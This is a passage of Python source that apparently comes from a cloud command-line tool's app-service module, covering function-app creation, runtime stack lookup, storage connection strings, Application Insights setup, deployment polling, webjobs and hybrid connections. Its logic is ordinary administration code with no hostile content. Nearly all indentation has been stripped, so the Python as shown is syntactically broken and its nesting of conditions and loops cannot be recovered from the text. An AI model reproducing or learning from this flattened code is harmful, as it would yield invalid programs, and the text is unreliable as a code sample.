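        # e.g. both 'node|12-lts' and 'node:12-lts' normalize to 'node|12-lts'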
if '|' in runtime:
runtime = re.split('[|]', runtime)
elif ':' in runtime:
runtime = re.split('[:]', runtime)
else:
runtime = [runtime]
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
            # get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will "
"be required. To create a 3.x function you would pass in the flag `--functions-version 3`")
functions_version = '3'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
from azure.mgmt.web.models import Site
SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
client = web_client_factory(cmd.cli_ctx)
if vnet or subnet:
if plan:
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
webapp_location = plan_info.location
else:
webapp_location = consumption_plan_location
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
functionapp_def = Site(location=None, site_config=site_config, tags=tags,
virtual_network_subnet_id=subnet_resource_id)
KEYS = FUNCTIONS_STACKS_API_KEYS()
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
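    ''' Return the stack entry matching runtime_version for the given Functions version, or, when no
    runtime_version is specified, the highest default version supported by that Functions version. '''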
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
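    ''' Converts a camelCase property name to snake_case, e.g. 'linuxFxVersion' -> 'linux_fx_version' '''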
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def _get_content_share_name(app_name):
    # the content share name should be up to 63 characters long, made of lowercase letters and digits, and random,
    # so take the first 50 characters of the app name and append the last 12 characters of a random uuid
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
    # We emit this success message as a warning so it does not interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
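    ''' Resolve the storage account (name or resource ID), verify it exposes blob, queue and table
    endpoints with an allowed SKU, and build a connection string from its first account key. '''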
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS'] # pylint: disable=line-too-long
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
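    ''' Poll the Kudu deployment status endpoint every 2 seconds until the timeout (default ~15 minutes).
    Status 4 means the deployment succeeded; status 3 means it failed. '''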
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
                if z == AccessRights.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
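    ''' Fetch the requested (primary or secondary) defaultSender key of the hybrid connection, creating
    the authorization rule if it is missing, and push the new key to every app on the plan that uses it. '''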
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
                if z == AccessRights.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
